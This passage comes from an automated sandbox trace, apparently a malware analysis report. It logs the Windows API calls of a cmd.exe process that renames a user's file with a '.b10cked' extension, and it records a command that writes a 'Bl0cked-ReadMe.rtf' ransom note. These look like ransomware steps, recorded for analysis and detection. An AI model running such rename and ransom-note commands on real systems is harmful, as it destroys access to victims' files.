lpData=0x16eb70, lpcbData=0x16eb68*=0x1000 | out: lpType=0x16eb6c*=0x4, lpData=0x16eb70*=0x1, lpcbData=0x16eb68*=0x4) returned 0x0 [0207.240] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eb6c, lpData=0x16eb70, lpcbData=0x16eb68*=0x1000 | out: lpType=0x16eb6c*=0x0, lpData=0x16eb70*=0x1, lpcbData=0x16eb68*=0x1000) returned 0x2 [0207.240] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eb6c, lpData=0x16eb70, lpcbData=0x16eb68*=0x1000 | out: lpType=0x16eb6c*=0x4, lpData=0x16eb70*=0x0, lpcbData=0x16eb68*=0x4) returned 0x0 [0207.240] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eb6c, lpData=0x16eb70, lpcbData=0x16eb68*=0x1000 | out: lpType=0x16eb6c*=0x4, lpData=0x16eb70*=0x9, lpcbData=0x16eb68*=0x4) returned 0x0 [0207.240] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eb6c, lpData=0x16eb70, lpcbData=0x16eb68*=0x1000 | out: lpType=0x16eb6c*=0x4, lpData=0x16eb70*=0x9, lpcbData=0x16eb68*=0x4) returned 0x0 [0207.240] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eb6c, lpData=0x16eb70, lpcbData=0x16eb68*=0x1000 | out: lpType=0x16eb6c*=0x0, lpData=0x16eb70*=0x9, lpcbData=0x16eb68*=0x1000) returned 0x2 [0207.240] RegCloseKey (hKey=0x40) returned 0x0 [0207.241] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a9 [0207.241] srand (_Seed=0x5b8863a9) [0207.241] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm\" \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm.b10cked\"" [0207.241] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm\" \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm.b10cked\"" [0207.241] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0207.241] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3318f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0207.241] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0207.241] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0207.241] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0207.241] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0207.241] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0207.241] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0207.241] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0207.241] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0207.242] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0207.242] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0207.242] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0207.242] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0207.242] GetEnvironmentStringsW () returned 0x3322e0* [0207.242] FreeEnvironmentStringsW (penv=0x3322e0) returned 1 [0207.242] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.242] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0207.242] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0207.242] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0207.242] 
_wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0207.242] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0207.242] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0207.242] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0207.242] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0207.242] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0207.242] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f930 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0207.242] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f930, lpFilePart=0x16f92c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f92c*="Desktop") returned 0x18 [0207.242] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0207.242] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f6ac | out: lpFindFileData=0x16f6ac) returned 0x330020 [0207.243] FindClose (in: hFindFile=0x330020 | out: hFindFile=0x330020) returned 1 [0207.243] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f6ac | out: lpFindFileData=0x16f6ac) returned 0x330020 [0207.243] FindClose (in: hFindFile=0x330020 | out: hFindFile=0x330020) returned 1 [0207.243] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f6ac | out: lpFindFileData=0x16f6ac) returned 0x330020 [0207.243] FindClose (in: hFindFile=0x330020 | out: hFindFile=0x330020) returned 1 [0207.243] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0207.243] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0207.243] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0207.243] GetEnvironmentStringsW () returned 0x332b00* 
[0207.244] FreeEnvironmentStringsW (penv=0x332b00) returned 1 [0207.244] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0207.244] GetConsoleOutputCP () returned 0x1b5 [0207.244] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0207.244] GetUserDefaultLCID () returned 0x409 [0207.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0207.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16fa70, cchData=128 | out: lpLCData="0") returned 2 [0207.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16fa70, cchData=128 | out: lpLCData="0") returned 2 [0207.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16fa70, cchData=128 | out: lpLCData="1") returned 2 [0207.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0207.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0207.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0207.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0207.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0207.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0207.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0207.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0207.245] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 
[0207.245] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0207.245] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0207.246] GetConsoleTitleW (in: lpConsoleTitle=0x3208e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.246] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0207.246] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0207.246] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0207.246] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0207.247] _wcsicmp (_String1="move", _String2=")") returned 68 [0207.247] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0207.247] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0207.247] _wcsicmp (_String1="IF", _String2="move") returned -4 [0207.247] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0207.247] _wcsicmp (_String1="REM", _String2="move") returned 5 [0207.247] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0207.250] GetConsoleTitleW (in: lpConsoleTitle=0x16f768, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.250] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0207.251] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0207.251] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0207.251] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0207.251] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0207.251] _wcsicmp (_String1="move", _String2="CD") returned 10 [0207.251] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0207.251] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0207.251] _wcsicmp (_String1="move", _String2="REN") returned -5 [0207.251] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0207.251] 
_wcsicmp (_String1="move", _String2="SET") returned -6 [0207.251] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0207.251] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0207.251] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0207.251] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0207.251] _wcsicmp (_String1="move", _String2="MD") returned 11 [0207.251] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0207.251] _wcsicmp (_String1="move", _String2="RD") returned -5 [0207.251] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0207.251] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0207.251] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0207.251] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0207.251] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0207.251] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0207.251] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0207.251] _wcsicmp (_String1="move", _String2="VER") returned -9 [0207.251] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0207.251] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0207.251] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0207.251] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0207.251] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0207.251] _wcsicmp (_String1="move", _String2="START") returned -6 [0207.252] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0207.252] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0207.252] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0207.253] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0207.253] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0207.253] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f524, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f51c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, 
lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f51c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) 
returned -13 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0207.255] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0207.255] _wcsicmp (_String1="state.rsm", _String2=".") returned 69 [0207.255] _wcsicmp (_String1="state.rsm", _String2="..") returned 69 [0207.428] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm" (normalized: "c:\\users\\alluse~1\\packag~1\\{f325f~1\\state.rsm")) returned 0x20 [0207.428] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x331e50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0207.428] SetErrorMode (uMode=0x0) returned 0x0 [0207.428] SetErrorMode (uMode=0x1) returned 0x0 [0207.428] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm", nBufferLength=0x104, lpBuffer=0x16eeac, lpFilePart=0x16ee94 | out: lpBuffer="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm", lpFilePart=0x16ee94*="state.rsm") returned 0x2d 
[0207.428] SetErrorMode (uMode=0x0) returned 0x1 [0207.428] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1" (normalized: "c:\\users\\alluse~1\\packag~1\\{f325f~1")) returned 0x10 [0207.428] _wcsicmp (_String1="state.rsm", _String2=".") returned 69 [0207.429] _wcsicmp (_String1="state.rsm", _String2="..") returned 69 [0207.429] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm" (normalized: "c:\\users\\alluse~1\\packag~1\\{f325f~1\\state.rsm")) returned 0x20 [0207.429] SetErrorMode (uMode=0x0) returned 0x0 [0207.429] SetErrorMode (uMode=0x1) returned 0x0 [0207.429] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm", nBufferLength=0x104, lpBuffer=0x16f328, lpFilePart=0x16f0c0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm", lpFilePart=0x16f0c0*="state.rsm") returned 0x2d [0207.429] SetErrorMode (uMode=0x0) returned 0x1 [0207.429] SetErrorMode (uMode=0x0) returned 0x0 [0207.429] SetErrorMode (uMode=0x1) returned 0x0 [0207.429] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm.b10cked", nBufferLength=0x104, lpBuffer=0x16f530, lpFilePart=0x16f0c0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm.b10cked", lpFilePart=0x16f0c0*="state.rsm.b10cked") returned 0x35 [0207.429] SetErrorMode (uMode=0x0) returned 0x1 [0207.429] SetLastError (dwErrCode=0x0) [0207.429] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm.b10cked" (normalized: "c:\\users\\alluse~1\\packag~1\\{f325f~1\\state.rsm.b10cked")) returned 0xffffffff [0207.429] GetLastError () returned 0x2 [0207.429] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm", fInfoLevelId=0x1, lpFindFileData=0x16ea3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ea3c) returned 0x320e88 [0207.430] FindNextFileW (in: hFindFile=0x320e88, lpFindFileData=0x16ea3c | out: 
lpFindFileData=0x16ea3c) returned 0 [0207.431] GetLastError () returned 0x12 [0207.431] FindClose (in: hFindFile=0x320e88 | out: hFindFile=0x320e88) returned 1 [0207.432] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm", fInfoLevelId=0x1, lpFindFileData=0x331bf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x331bf0) returned 0x320e88 [0207.433] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm.b10cked", nBufferLength=0x104, lpBuffer=0x16ecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm.b10cked", lpFilePart=0x0) returned 0x35 [0207.433] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm", nBufferLength=0x104, lpBuffer=0x16ecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm", lpFilePart=0x0) returned 0x2d [0207.433] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm" (normalized: "c:\\users\\alluse~1\\packag~1\\{f325f~1\\state.rsm")) returned 0x20 [0207.433] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm" (normalized: "c:\\users\\alluse~1\\packag~1\\{f325f~1\\state.rsm"), lpNewFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm.b10cked" (normalized: "c:\\users\\alluse~1\\packag~1\\{f325f~1\\state.rsm.b10cked"), dwFlags=0x3) returned 1 [0207.434] FindClose (in: hFindFile=0x320e88 | out: hFindFile=0x320e88) returned 1 [0207.434] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x16ec88 | out: _Buffer=" 1") returned 9 [0207.434] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.434] GetFileType (hFile=0x7) returned 0x2 [0207.434] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.434] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16ec14 | out: lpMode=0x16ec14) returned 1 [0207.434] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.435] 
GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ec48 | out: lpConsoleScreenBufferInfo=0x16ec48) returned 1 [0207.435] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0207.435] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x16ec88 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0207.435] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x16ec6c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x16ec6c*=0x1a) returned 1 [0207.436] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.436] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0207.436] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.436] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0207.436] _get_osfhandle (_FileHandle=0) returned 0x3 [0207.436] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0207.437] SetConsoleInputExeNameW () returned 0x1 [0207.437] GetConsoleOutputCP () returned 0x1b5 [0207.437] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0207.437] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.437] exit (_Code=0) Process: id = "500" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea169e0" os_pid = "0x924" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" 
os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30526 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30527 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30528 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30529 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 30530 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 30531 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30532 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30533 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30534 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" 
filename = "" Region: id = 30535 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30570 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30571 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30572 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 30573 start_va = 0x300000 end_va = 0x366fff entry_point = 0x300000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30574 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 30575 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30576 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30577 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30578 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30579 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 
